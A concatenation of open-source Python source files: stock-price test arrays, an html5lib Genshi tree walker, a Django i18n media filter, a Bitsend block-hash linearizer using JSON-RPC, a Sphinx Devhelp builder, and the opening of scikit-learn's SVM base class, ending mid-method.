12.51, 12.35, 12.33, 12.55, 12.50, 12.71, 12.46, 12.38, 12.26, 12.19,
11.99, 11.94, 11.98, 12.01, 11.98, 11.81, 11.81, 11.71, 11.15, 11.61,
11.51, 11.71, 12.03, 11.42, 11.25, 11.16, 11.13, 10.84, 10.53, 10.60,
10.48, 10.83, 10.61, 10.41, 10.34, 10.23, 10.16, 10.08, 10.02, 10.25,
10.32, 10.50, 10.61, 10.69, 10.73, 10.62, 10.33, 10.15, 10.01, 10.29,
10.73, 10.48, 10.77, 10.47, 10.39, 10.27, 10.40, 10.35, 10.37, 10.58,
10.65, 10.35, 10.13, 10.06, 10.05, 9.93, 9.95, 9.50, 9.53, 9.67, 9.47,
9.46, 9.50, 9.33, 9.26, 9.16, 9.22, 9.28, 9.38, 9.45, 9.28, 9.08, 9.17,
9.17, 9.05, 8.99, 9.04, 9.13, 9.29, 8.99, 9.02, 9.13, 9.18, 9.25, 9.31,
9.30, 9.35, 9.45, 9.44, 9.50, 9.65, 9.58, 9.65, 9.50, 9.45, 9.42, 9.51,
9.37, 9.33, 9.30, 9.39, 9.37, 9.45, 9.66, 9.95, 10.08, 10.18, 10.25,
10.20, 10.41, 10.27, 10.30, 10.49, 10.48, 10.53, 10.30, 10.35, 9.98,
10.13, 9.99, 9.89, 10.01, 9.82, 10.06, 10.17, 10.06, 10.21, 10.12,
10.06, 10.14, 10.11, 10.26, 10.31, 10.36, 10.42, 10.14, 10.02, 10.08,
10.42, 10.35, 10.70, 11.19, 11.31, 11.15, 11.33, 11.25, 11.07, 10.76,
11.03, 10.89, 11.02, 10.57, 10.58, 10.65, 10.85, 10.84, 10.98, 11.05,
11.10, 11.05, 11.32, 11.52, 11.56, 11.40, 11.32, 11.26, 11.27, 11.41,
11.51, 11.52, 11.46, 11.27, 11.16, 11.48, 11.79, 11.74, 11.55, 11.67,
12.31, 12.79, 12.55, 12.88, ]),
'high': np.asarray([ 11.25, 11.53, 11.63, 11.80, 11.95, 12.05, 12.18, 12.18,
12.08, 12.26, 12.37, 12.72, 12.64, 12.84, 12.86, 12.98, 13.05, 12.53,
12.44, 12.51, 12.75, 12.43, 12.84, 13.00, 12.97, 12.96, 12.90, 12.66,
12.74, 12.58, 12.57, 12.77, 12.88, 12.76, 12.51, 12.44, 12.46, 12.36,
12.35, 12.55, 12.77, 12.94, 12.68, 12.25, 12.30, 12.55, 12.73, 12.59,
12.72, 12.90, 13.04, 12.90, 12.68, 12.61, 12.67, 12.54, 12.37, 12.50,
12.61, 12.36, 12.52, 12.58, 12.65, 12.95, 12.52, 12.58, 12.29, 12.28,
12.02, 12.13, 12.03, 12.05, 12.00, 11.85, 11.88, 11.72, 11.40, 11.61,
11.75, 11.93, 12.04, 11.47, 11.34, 11.17, 11.15, 10.87, 10.79, 10.64,
10.81, 10.86, 10.83, 10.53, 10.34, 10.43, 10.25, 10.18, 10.23, 10.40,
10.45, 10.62, 10.68, 10.88, 10.75, 10.68, 10.37, 10.18, 10.24, 10.58,
10.78, 10.68, 10.80, 10.55, 10.49, 10.45, 10.42, 10.40, 10.64, 10.74,
10.68, 10.40, 10.18, 10.08, 10.10, 10.09, 9.98, 9.60, 9.79, 9.74, 9.52,
9.47, 9.55, 9.38, 9.28, 9.32, 9.32, 9.35, 9.52, 9.50, 9.35, 9.21, 9.24,
9.20, 9.11, 9.10, 9.18, 9.28, 9.42, 9.03, 9.15, 9.21, 9.39, 9.38, 9.46,
9.36, 9.42, 9.66, 9.54, 9.67, 9.66, 9.64, 9.70, 9.56, 9.54, 9.52, 9.52,
9.44, 9.40, 9.34, 9.43, 9.47, 9.62, 9.96, 10.23, 10.28, 10.25, 10.30,
10.38, 10.57, 10.42, 10.45, 10.66, 10.52, 10.54, 10.40, 10.37, 10.12,
10.18, 10.00, 10.08, 10.05, 10.02, 10.15, 10.28, 10.12, 10.25, 10.12,
10.26, 10.25, 10.25, 10.32, 10.41, 10.57, 10.43, 10.24, 10.11, 10.29,
10.49, 10.42, 11.17, 11.30, 11.38, 11.35, 11.59, 11.34, 11.23, 11.10,
11.16, 11.10, 11.05, 10.80, 10.64, 10.90, 11.02, 11.00, 11.10, 11.14,
11.27, 11.26, 11.53, 11.60, 11.70, 11.44, 11.40, 11.31, 11.50, 11.53,
11.58, 11.56, 11.50, 11.27, 11.41, 11.68, 11.85, 11.80, 11.86, 12.40,
12.79, 12.81, 12.88, 13.08, ]),
'low': np.asarray([ 10.99, 11.07, 11.24, 11.52, 11.70, 11.63, 11.65, 11.89,
11.84, 11.96, 12.00, 12.43, 12.45, 12.55, 12.46, 12.70, 12.66, 11.79,
12.00, 12.20, 12.29, 12.20, 12.39, 12.71, 12.83, 12.80, 12.67, 12.37,
12.51, 12.34, 12.33, 12.38, 12.71, 12.46, 12.22, 12.16, 12.19, 11.99,
12.20, 12.25, 12.45, 12.68, 12.41, 12.00, 12.15, 12.32, 12.48, 12.37,
12.40, 12.63, 12.83, 12.51, 12.48, 12.39, 12.55, 12.24, 12.18, 12.39,
12.30, 12.18, 12.24, 12.40, 12.44, 12.46, 12.32, 12.38, 12.11, 11.65,
11.88, 11.86, 11.84, 11.83, 11.88, 11.72, 11.58, 11.39, 11.15, 11.36,
11.43, 11.67, 11.52, 11.15, 11.11, 11.00, 10.85, 10.63, 10.52, 10.40,
10.41, 10.66, 10.56, 10.30, 10.10, 10.15, 10.01, 9.96, 10.00, 10.15,
10.22, 10.38, 10.51, 10.68, 10.52, 10.40, 10.06, 9.91, 9.97, 10.27,
10.52, 10.38, 10.45, 10.31, 10.22, 10.21, 10.26, 10.26, 10.35, 10.52,
10.25, 10.18, 9.95, 9.96, 9.97, 9.93, 9.46, 9.30, 9.49, 9.53, 9.40,
9.31, 9.28, 9.26, 9.12, 9.14, 9.15, 9.12, 9.34, 9.33, 9.18, 9.05, 8.95,
8.91, 8.83, 8.88, 9.01, 9.12, 8.99, 8.82, 8.96, 9.09, 9.18, 9.24, 9.30,
9.23, 9.25, 9.42, 9.41, 9.49, 9.60, 9.51, 9.52, 9.40, 9.42, 9.41, 9.38,
9.31, 9.29, 9.25, 9.31, 9.35, 9.39, 9.66, 9.93, 10.06, 10.13, 10.17,
10.12, 10.39, 10.26, 10.28, 10.45, 10.35, 10.36, 10.26, 10.06, 9.86,
10.02, 9.81, 9.88, 9.71, 9.76, 9.96, 10.13, 9.99, 10.02, 9.95, 10.05,
10.09, 10.09, 10.22, 10.26, 10.33, 10.13, 10.03, 9.97, 10.01, 10.28,
10.22, 10.60, 10.88, 11.15, 11.13, 11.26, 11.04, 10.89, 10.71, 10.96,
10.86, 10.62, 10.46, 10.38, 10.65, 10.76, 10.80, 10.96, 10.97, 11.10,
10.98, 11.32, 11.33, 11.40, 11.23, 11.18, 11.19, 11.26, 11.41, 11.40,
11.43, 11.21, 11.03, 11.14, 11.40, 11.62, 11.58, 11.47, 11.67, 12.31,
12.36, 12.52, 12.76, ]),
'close': np.asarray([ 11.13, 11.30, 11.59, 11.71, 11.80, 11.80, 12.07, 12.14,
12.04, 12.02, 12.34, 12.61, 12.59, 12.66, 12.82, 12.93, 12.79, 12.21,
12.29, 12.42, 12.33, 12.26, 12.79, 12.96, 12.88, 12.84, 12.69, 12.44,
12.54, 12.48, 12.38, 12.74, 12.75, 12.53, 12.28, 12.40, 12.23, 12.30,
12.25, 12.38, 12.66, 12.72, 12.46, 12.09, 12.24, 12.46, 12.58, 12.43,
12.70, 12.88, 12.90, 12.51, 12.63, 12.54, 12.57, 12.32, 12.32, 12.48,
12.32, 12.32, 12.50, 12.48, 12.62, 12.64, 12.51, 12.47, 12.22, 11.79,
11.91, 12.07, 11.92, 11.88, 11.91, 11.79, 11.66, 11.41, 11.35, 11.39,
11.73, 11.87, 11.60, 11.28, 11.23, 11.10, 10.92, 10.67, 10.66, 10.61,
10.69, 10.71, 10.58, 10.32, 10.15, 10.16, 10.01, 10.01, 10.20, 10.19,
10.41, 10.59, 10.60, 10.84, 10.66, 10.56, 10.12, 10.04, 10.19, 10.57,
10.55, 10.66, 10.45, 10.50, 10.30, 10.41, 10.35, 10.34, 10.56, 10.65,
10.27, 10.19, 10.01, 10.01, 10.02, 10.09, 9.59, 9.39, 9.60, 9.57, 9.50,
9.45, 9.35, 9.33, 9.13, 9.27, 9.26, 9.34, 9.38, 9.35, 9.21, 9.17, 9.06,
8.97, 8.96, 9.00, 9.10, 9.24, 9.04, 8.92, 9.09, 9.15, 9.31, 9.35, 9.34,
9.35, 9.40, 9.44, 9.49, 9.59, 9.63, 9.63, 9.53, 9.49, 9.45, 9.49, 9.39,
9.34, 9.32, 9.31, 9.34, 9.41, 9.57, 9.92, 10.14, 10.11, 10.15, 10.21,
10.34, 10.53, 10.39, 10.42, 10.59, 10.44, 10.40, 10.32, 10.09, 10.01,
10.02, 9.86, 9.93, 9.79, 9.94, 10.11, 10.16, 10.05, 10.10, 9.98, 10.14,
10.12, 10.22, 10.30, 10.41, 10.43, 10.18, 10.17, 10.00, 10.17, 10.39,
10.36, 11.16, 11.25, 11.17, 11.25, 11.42, 11.06, 10.90, 10.93, 10.97,
11.00, 10.67, 10.57, 10.50, 10.83, 10.85, 10.92, 11.10, 11.11, 11.10,
11.25, 11.53, 11.45, 11.41, 11.31, 11.31, 11.24, 11.48, 11.47, 11.49,
11.47, 11.27, 11.10, 11.39, 11.67, 11.73, 11.77, 11.86, 12.40, 12.79,
12.76, 12.87, 12.95, ]),
'volume': np.asarray([ 45709900, 79725200, 67877500, 59840700, 53981500,
121750600, 63806000, 48687700, 46366700, 44398400, 47102700, 70894200,
43705700, 49379700, 45768400, 54021600, 75470700, 142155300, 57752600,
46412100, 71669000, 48347600, 78851200, 46363300, 39413500, 35352500,
52290500, 52505500, 34474400, 39627900, 38174800, 49164400, 30778000,
38409800, 43326000, 36747600, 31399300, 38703400, 30789000, 62093700,
68262000, 49063500, 28433700, 57374500, 28440900, 37099100, 36159300,
30275700, 42783600, 47578500, 55286600, 77119600, 52445700, 40214400,
27521400, 50117100, 44755000, 26692200, 35070700, 41051700, 51039700,
36381000, 43966900, 97034200, 51505000, 37939500, 42515300, 77370300,
34724400, 26988800, 39675000, 31903500, 35981200, 32314000, 48169200,
52631000, 31269200, 38615200, 45185400, 40889300, 83070300, 46156300,
43959200, 48572900, 40238400, 53268400, 33235200, 46174500, 54501200,
42526100, 36561300, 50225200, 41886500, 44321300, 49648900, 50572000,
38134900, 44295700, 75647800, 45334100, 30430800, 43760600, 44592100,
54297000, 68237000, 57305600, 38326200, 50458000, 33846100, 30811600,
35811400, 35130800, 53471900, 37531800, 39442000, 27361000, 37155900,
40810100, 40062800, 56427300, 44297600, 31871900, 33278900, 38648400,
138138600, 63388600, 49629300, 31783900, 30355400, 37441600, 33516600,
32028700, 55111000, 30248300, 28838200, 29510000, 31010000, 33615000,
27968300, 33773800, 53519200, 44338200, 51798900, 67986800, 40958300,
41360900, 65973000, 45326500, 38631400, 23819100, 43574500, 22630300,
30909800, 19618800, 21122000, 21129500, 21308300, 34323700, 34533900,
38923800, 26281100, 26965500, 23537700, 19574600, 22754200, 23084400,
26115700, 16459400, 28029200, 37965000, 40608800, 67996400, 60617000,
43381300, 28165300, 28046500, 50920200, 55934300, 31922200, 34937000,
42403000, 28755100, 35459800, 28557900, 36866300, 44362600, 25740900,
44586300, 33445600, 63630000, 51023800, 46855500, 40693900, 25473900,
38235700, 33951600, 39328700, 24108500, 26466500, 32788400, 29346300,
44041700, 40493000, 39149700, 32476500, 49339800, 59290900, 43485500,
137960900, 88770100, 53399000, 37995000, 51232200, 56674900, 45948800,
40703600, 25723100, 33342900, 45664700, 48879800, 45346200, 39359100,
34739800, 21181700, 16032200, 26831700, 37610000, 38496900, 57289300,
41329600, 47746300, 37760200, 33152400, 31065800, 38404500, 26025200,
36326900, 31099900, 35443200, 36933500, 46983300, 61810400, 54884700,
47750100, 94489300, 91734900, 140331900, 108315100, 95668600, 106908900 ]),
}
series = np.array([ 91.50, 94.81, 94.38, 95.09, 93.78, 94.62, 92.53, 92.75,
90.31, 92.47, 96.12, 97.25, 98.50, 89.88, 91.00, 92.81, 89.16, 89.34,
91.62, 89.88, 88.38, 87.62, 84.78, 83.00, 83.50, 81.38, 84.44, 89.25,
86.38, 86.25, 85.25, 87.12, 85.81, 88.97, 88.47, 86.88, 86.81, 84.88,
84.19, 83.88, 83.38, 85.50, 89.19, 89.44, 91.09, 90.75, 91.44, 89.00,
91.00, 90.50, 89.03, 88.81, 84.28, 83.50, 82.69, 84.75, 85.66, 86.19,
88.94, 89.28, 88.62, 88.50, 91.97, 91.50, 93.25, 93.50, 93.16, 91.72,
90.00, 89.69, 88.88, 85.19, 83.38, 84.88, 85.94, 97.25, 99.88, 104.94,
106.00, 102.50, 102.41, 104.59, 106.12, 106.00, 106.06, 104.62, 108.62,
109.31, 110.50, 112.75, 123.00, 119.62, 118.75, 119.25, 117.94, 116.44,
115.19, 111.88, 110.59, 118.12, 116.00, 116.00, 112.00, 113.75, 112.94,
116.00, 120.50, 116.62, 117.00, 115.25, 114.31, 115.50, 115.87, 120.69,
120.19, 120.75, 124.75, 123.37, 122.94, 122.56, 123.12, 122.56, 124.62,
129.25, 131.00, 132.25, 131.00, 132.81, 134.00, 137.38, 137.81, 137.88,
137.25, 136.31, 136.25, 134.63, 128.25, 129.00, 123.87, 124.81, 123.00,
126.25, 128.38, 125.37, 125.69, 122.25, 119.37, 118.50, 123.19, 123.50,
122.19, 119.31, 123.31, 121.12, 123.37, 127.37, 128.50, 123.87, 122.94,
121.75, 124.44, 122.00, 122.37, 122.94, 124.00, 123.19, 124.56, 127.25,
125.87, 128.86, 132.00, 130.75, 134.75, 135.00, 132.38, 133.31, 131.94,
130.00, 125.37, 130.13, 127.12, 125.19, 122.00, 125.00, 123.00, 123.50,
120.06, 121.00, 117.75, 119.87, 122.00, 119.19, 116.37, 113.50, 114.25,
110.00, 105.06, 107.00, 107.87, 107.00, 107.12, 107.00, 91.00, 93.94,
93.87, 95.50, 93.00, 94.94, 98.25, 96.75, 94.81, 94.37, 91.56, 90.25,
93.94, 93.62, 97.00, 95.00, 95.87, 94.06, 94.62, 93.75, 98.00, 103.94,
107.87, 106.06, 104.50, 105.00, 104.19, 103.06, 103.42, 105.27, 111.87,
116.00, 116.62, 118.28, 113.37, 109.00, 109.70, 109.25, 107.00, 109.19,
110.00, 109.20, 110.12, 108.00, 108.62, 109.75, 109.81, 109.00, 108.75,
107.87 ])
def assert_np_arrays_equal(expected, got):
for i, value in enumerate(expected):
if np.isnan(value):
assert_true(np.isnan(got[i]))
else:
assert_equal(value, got[i])
def assert_np_arrays_not_equal(expected, got):
''' Verifies expected and got have the same number of leading nan fields,
followed by different floats.
'''
nans = []
equals = []
for i, value in enumerate(expected):
if np.isnan(value):
assert_true(np.isnan(got[i]))
nans.append(value)
else:
try:
assert_not_equal(value, got[i])
except AssertionError:
equals.append(got[i])
if len(equals) == len(expected[len(nans):]):
raise AssertionError('Arrays were equal.')
elif equals:
print('Arrays had %i/%i equivalent values.' % (len(equals), len(expected[len(nans):])))
| bsd-2-clause |
docmeth02/CouchPotatoServer | libs/html5lib/treewalkers/genshistream.py | 1730 | 2278 | from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import _base
from ..constants import voidElements, namespaces
class TreeWalker(_base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, pos = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END
or next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
| gpl-3.0 |
brunogamacatao/portalsaladeaula | mediagenerator/filters/i18n.py | 2 | 2150 | from django.conf import settings
from django.http import HttpRequest
from django.utils.encoding import smart_str
from django.views.i18n import javascript_catalog
from hashlib import sha1
from mediagenerator.generators.bundles.base import Filter
if settings.USE_I18N:
LANGUAGES = [code for code, _ in settings.LANGUAGES]
else:
LANGUAGES = (settings.LANGUAGE_CODE,)
class I18N(Filter):
takes_input = False
def __init__(self, **kwargs):
super(I18N, self).__init__(**kwargs)
assert self.filetype == 'js', (
'I18N only supports compilation to js. '
'The parent filter expects "%s".' % self.filetype)
def get_variations(self):
return {'language': LANGUAGES}
def get_output(self, variation):
language = variation['language']
yield self._generate(language)
def get_dev_output(self, name, variation):
language = variation['language']
assert language == name
return self._generate(language)
def get_dev_output_names(self, variation):
language = variation['language']
content = self._generate(language)
hash = sha1(smart_str(content)).hexdigest()
yield language, hash
def _generate(self, language):
language_bidi = language.split('-')[0] in settings.LANGUAGES_BIDI
request = HttpRequest()
request.GET['language'] = language
# Add some JavaScript data
content = 'var LANGUAGE_CODE = "%s";\n' % language
content += 'var LANGUAGE_BIDI = ' + \
(language_bidi and 'true' or 'false') + ';\n'
content += javascript_catalog(request,
packages=settings.INSTALLED_APPS).content
# The hgettext() function just calls gettext() internally, but
# it won't get indexed by makemessages.
content += '\nwindow.hgettext = function(text) { return gettext(text); };\n'
# Add a similar hngettext() function
content += 'window.hngettext = function(singular, plural, count) { return ngettext(singular, plural, count); };\n'
return content
| bsd-3-clause |
LIMXTEC/BitSend | contrib/linearize/linearize-hashes.py | 3 | 3974 | #!/usr/bin/env python3
#
# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2016 The Bitsend Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function
try: # Python 3
import http.client as httplib
except ImportError: # Python 2
import httplib
import json
import re
import base64
import sys
settings = {}
##### Switch endian-ness #####
def hex_switchEndian(s):
""" Switches the endianness of a hex string (in pairs of hex chars) """
pairList = [s[i:i+2].encode() for i in range(0, len(s), 2)]
return b''.join(pairList[::-1]).decode()
class BitsendRPC:
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
authpair = authpair.encode('utf-8')
self.authhdr = b"Basic " + base64.b64encode(authpair)
self.conn = httplib.HTTPConnection(host, port=port, timeout=30)
def execute(self, obj):
try:
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
except ConnectionRefusedError:
print('RPC connection refused. Check RPC settings and the server status.',
file=sys.stderr)
return None
resp = self.conn.getresponse()
if resp is None:
print("JSON-RPC: no response", file=sys.stderr)
return None
body = resp.read().decode('utf-8')
resp_obj = json.loads(body)
return resp_obj
@staticmethod
def build_request(idx, method, params):
obj = { 'version' : '1.1',
'method' : method,
'id' : idx }
if params is None:
obj['params'] = []
else:
obj['params'] = params
return obj
@staticmethod
def response_is_error(resp_obj):
return 'error' in resp_obj and resp_obj['error'] is not None
def get_block_hashes(settings, max_blocks_per_call=10000):
rpc = BitsendRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpassword'])
height = settings['min_height']
while height < settings['max_height']+1:
num_blocks = min(settings['max_height']+1-height, max_blocks_per_call)
batch = []
for x in range(num_blocks):
batch.append(rpc.build_request(x, 'getblockhash', [height + x]))
reply = rpc.execute(batch)
if reply is None:
print('Cannot continue. Program will halt.')
return None
for x,resp_obj in enumerate(reply):
if rpc.response_is_error(resp_obj):
print('JSON-RPC: error at height', height+x, ': ', resp_obj['error'], file=sys.stderr)
exit(1)
assert(resp_obj['id'] == x) # assume replies are in-sequence
if settings['rev_hash_bytes'] == 'true':
resp_obj['result'] = hex_switchEndian(resp_obj['result'])
print(resp_obj['result'])
height += num_blocks
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: linearize-hashes.py CONFIG-FILE")
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'min_height' not in settings:
settings['min_height'] = 0
if 'max_height' not in settings:
settings['max_height'] = 313000
if 'rev_hash_bytes' not in settings:
settings['rev_hash_bytes'] = 'false'
if 'rpcuser' not in settings or 'rpcpassword' not in settings:
print("Missing username and/or password in cfg file", file=stderr)
sys.exit(1)
settings['port'] = int(settings['port'])
settings['min_height'] = int(settings['min_height'])
settings['max_height'] = int(settings['max_height'])
# Force hash byte format setting to be lowercase to make comparisons easier.
settings['rev_hash_bytes'] = settings['rev_hash_bytes'].lower()
get_block_hashes(settings)
| mit |
WhySoGeeky/DroidPot | venv/lib/python2.7/site-packages/sphinx/builders/devhelp.py | 4 | 4119 | # -*- coding: utf-8 -*-
"""
sphinx.builders.devhelp
~~~~~~~~~~~~~~~~~~~~~~~
Build HTML documentation and Devhelp_ support files.
.. _Devhelp: http://live.gnome.org/devhelp
:copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import absolute_import
import re
from os import path
from docutils import nodes
from sphinx import addnodes
from sphinx.builders.html import StandaloneHTMLBuilder
try:
import xml.etree.ElementTree as etree
except ImportError:
try:
import lxml.etree as etree
except ImportError:
try:
import elementtree.ElementTree as etree
except ImportError:
import cElementTree as etree
try:
import gzip
def comp_open(filename, mode='rb'):
return gzip.open(filename + '.gz', mode)
except ImportError:
def comp_open(filename, mode='rb'):
return open(filename, mode)
class DevhelpBuilder(StandaloneHTMLBuilder):
"""
Builder that also outputs GNOME Devhelp file.
"""
name = 'devhelp'
# don't copy the reST source
copysource = False
supported_image_types = ['image/png', 'image/gif', 'image/jpeg']
# don't add links
add_permalinks = False
# don't add sidebar etc.
embedded = True
def init(self):
StandaloneHTMLBuilder.init(self)
self.out_suffix = '.html'
def handle_finish(self):
self.build_devhelp(self.outdir, self.config.devhelp_basename)
def build_devhelp(self, outdir, outname):
self.info('dumping devhelp index...')
# Basic info
root = etree.Element('book',
title=self.config.html_title,
name=self.config.project,
link="index.html",
version=self.config.version)
tree = etree.ElementTree(root)
# TOC
chapters = etree.SubElement(root, 'chapters')
tocdoc = self.env.get_and_resolve_doctree(
self.config.master_doc, self, prune_toctrees=False)
def write_toc(node, parent):
if isinstance(node, addnodes.compact_paragraph) or \
isinstance(node, nodes.bullet_list):
for subnode in node:
write_toc(subnode, parent)
elif isinstance(node, nodes.list_item):
item = etree.SubElement(parent, 'sub')
for subnode in node:
write_toc(subnode, item)
elif isinstance(node, nodes.reference):
parent.attrib['link'] = node['refuri']
parent.attrib['name'] = node.astext().encode('utf-8')
def istoctree(node):
return isinstance(node, addnodes.compact_paragraph) and \
'toctree' in node
for node in tocdoc.traverse(istoctree):
write_toc(node, chapters)
# Index
functions = etree.SubElement(root, 'functions')
index = self.env.create_index(self)
def write_index(title, refs, subitems):
if len(refs) == 0:
pass
elif len(refs) == 1:
etree.SubElement(functions, 'function',
name=title, link=refs[0][1])
else:
for i, ref in enumerate(refs):
etree.SubElement(functions, 'function',
name="[%d] %s" % (i, title),
link=ref[1])
if subitems:
parent_title = re.sub(r'\s*\(.*\)\s*$', '', title)
for subitem in subitems:
write_index("%s %s" % (parent_title, subitem[0]),
subitem[1], [])
for (key, group) in index:
for title, (refs, subitems) in group:
write_index(title, refs, subitems)
# Dump the XML file
f = comp_open(path.join(outdir, outname + '.devhelp'), 'w')
try:
tree.write(f)
finally:
f.close()
| mit |
pv/scikit-learn | sklearn/svm/base.py | 156 | 36018 | from __future__ import print_function
import numpy as np
import scipy.sparse as sp
import warnings
from abc import ABCMeta, abstractmethod
from . import libsvm, liblinear
from . import libsvm_sparse
from ..base import BaseEstimator, ClassifierMixin, ChangedBehaviorWarning
from ..preprocessing import LabelEncoder
from ..multiclass import _ovr_decision_function
from ..utils import check_array, check_random_state, column_or_1d
from ..utils import ConvergenceWarning, compute_class_weight, deprecated
from ..utils.extmath import safe_sparse_dot
from ..utils.validation import check_is_fitted, NotFittedError
from ..externals import six
LIBSVM_IMPL = ['c_svc', 'nu_svc', 'one_class', 'epsilon_svr', 'nu_svr']
def _one_vs_one_coef(dual_coef, n_support, support_vectors):
"""Generate primal coefficients from dual coefficients
for the one-vs-one multi class LibSVM in the case
of a linear kernel."""
# get 1vs1 weights for all n*(n-1) classifiers.
# this is somewhat messy.
# shape of dual_coef_ is nSV * (n_classes -1)
# see docs for details
n_class = dual_coef.shape[0] + 1
# XXX we could do preallocation of coef but
# would have to take care in the sparse case
coef = []
sv_locs = np.cumsum(np.hstack([[0], n_support]))
for class1 in range(n_class):
# SVs for class1:
sv1 = support_vectors[sv_locs[class1]:sv_locs[class1 + 1], :]
for class2 in range(class1 + 1, n_class):
# SVs for class1:
sv2 = support_vectors[sv_locs[class2]:sv_locs[class2 + 1], :]
# dual coef for class1 SVs:
alpha1 = dual_coef[class2 - 1, sv_locs[class1]:sv_locs[class1 + 1]]
# dual coef for class2 SVs:
alpha2 = dual_coef[class1, sv_locs[class2]:sv_locs[class2 + 1]]
# build weight for class1 vs class2
coef.append(safe_sparse_dot(alpha1, sv1)
+ safe_sparse_dot(alpha2, sv2))
return coef
class BaseLibSVM(six.with_metaclass(ABCMeta, BaseEstimator)):
"""Base class for estimators that use libsvm as backing library
This implements support vector machine classification and regression.
Parameter documentation is in the derived `SVC` class.
"""
# The order of these must match the integer values in LibSVM.
# XXX These are actually the same in the dense case. Need to factor
# this out.
_sparse_kernels = ["linear", "poly", "rbf", "sigmoid", "precomputed"]
@abstractmethod
def __init__(self, impl, kernel, degree, gamma, coef0,
tol, C, nu, epsilon, shrinking, probability, cache_size,
class_weight, verbose, max_iter, random_state):
if impl not in LIBSVM_IMPL: # pragma: no cover
raise ValueError("impl should be one of %s, %s was given" % (
LIBSVM_IMPL, impl))
# FIXME Remove gamma=0.0 support in 0.18
if gamma == 0:
msg = ("gamma=%s has been deprecated in favor of "
"gamma='%s' as of 0.17. Backward compatibility"
" for gamma=%s will be removed in %s")
invalid_gamma = 0.0
warnings.warn(msg % (invalid_gamma, "auto", invalid_gamma, "0.18"),
DeprecationWarning)
self._impl = impl
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.tol = tol
self.C = C
self.nu = nu
self.epsilon = epsilon
self.shrinking = shrinking
self.probability = probability
self.cache_size = cache_size
self.class_weight = class_weight
self.verbose = verbose
self.max_iter = max_iter
self.random_state = random_state
@property
def _pairwise(self):
# Used by cross_val_score.
kernel = self.kernel
return kernel == "precomputed" or callable(kernel)
def fit(self, X, y, sample_weight=None):
"""Fit the SVM model according to the given training data.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
For kernel="precomputed", the expected shape of X is
(n_samples, n_samples).
y : array-like, shape (n_samples,)
Target values (class labels in classification, real numbers in
regression)
sample_weight : array-like, shape (n_samples,)
Per-sample weights. Rescale C per sample. Higher weights
force the classifier to put more emphasis on these points.
Returns
-------
self : object
Returns self.
Notes
------
If X and y are not C-ordered and contiguous arrays of np.float64 and
X is not a scipy.sparse.csr_matrix, X and/or y may be copied.
If X is a dense array, then the other methods will not support sparse
matrices as input.
"""
rnd = check_random_state(self.random_state)
sparse = sp.isspmatrix(X)
if sparse and self.kernel == "precomputed":
raise TypeError("Sparse precomputed kernels are not supported.")
self._sparse = sparse and not callable(self.kernel)
X = check_array(X, accept_sparse='csr', dtype=np.float64, order='C')
y = self._validate_targets(y)
sample_weight = np.asarray([]
if sample_weight is None
else sample_weight, dtype=np.float64)
solver_type = LIBSVM_IMPL.index(self._impl)
# input validation
if solver_type != 2 and X.shape[0] != y.shape[0]:
raise ValueError("X and y have incompatible shapes.\n" +
"X has %s samples, but y has %s." %
(X.shape[0], y.shape[0]))
if self.kernel == "precomputed" and X.shape[0] != X.shape[1]:
raise ValueError("X.shape[0] should be equal to X.shape[1]")
if sample_weight.shape[0] > 0 and sample_weight.shape[0] != X.shape[0]:
raise ValueError("sample_weight and X have incompatible shapes: "
"%r vs %r\n"
"Note: Sparse matrices cannot be indexed w/"
"boolean masks (use `indices=True` in CV)."
% (sample_weight.shape, X.shape))
# FIXME remove (self.gamma == 0) in 0.18
if (self.kernel in ['poly', 'rbf']) and ((self.gamma == 0) or
(self.gamma == 'auto')):
# if custom gamma is not provided ...
self._gamma = 1.0 / X.shape[1]
elif self.gamma == 'auto':
self._gamma = 0.0
else:
self._gamma = self.gamma
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
fit = self._sparse_fit if self._sparse else self._dense_fit
if self.verbose: # pragma: no cover
print('[LibSVM]', end='')
seed = rnd.randint(np.iinfo('i').max)
fit(X, y, sample_weight, solver_type, kernel, random_seed=seed)
# see comment on the other call to np.iinfo in this file
self.shape_fit_ = X.shape
# In binary case, we need to flip the sign of coef, intercept and
# decision function. Use self._intercept_ and self._dual_coef_ internally.
